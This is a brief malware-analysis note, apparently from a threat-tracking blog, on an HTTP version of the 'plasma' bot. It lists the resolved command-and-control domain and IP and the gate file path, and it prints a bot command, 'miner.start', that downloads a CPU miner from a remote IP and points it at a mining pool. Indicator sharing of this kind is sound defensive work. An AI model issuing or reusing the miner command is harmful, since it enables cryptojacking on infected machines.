Resolved illuminati.sx to 18.104.22.168
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/22.214.171.124
Bitcoin mining info:
miner.start http://126.96.36.199/miner/CPUMiner.files *-a scrypt -o stratum+tcp://pool.d2.cc:3335 -O avaster.x:x -t THREADS*
Related md5s (Download sample from Malwr.com)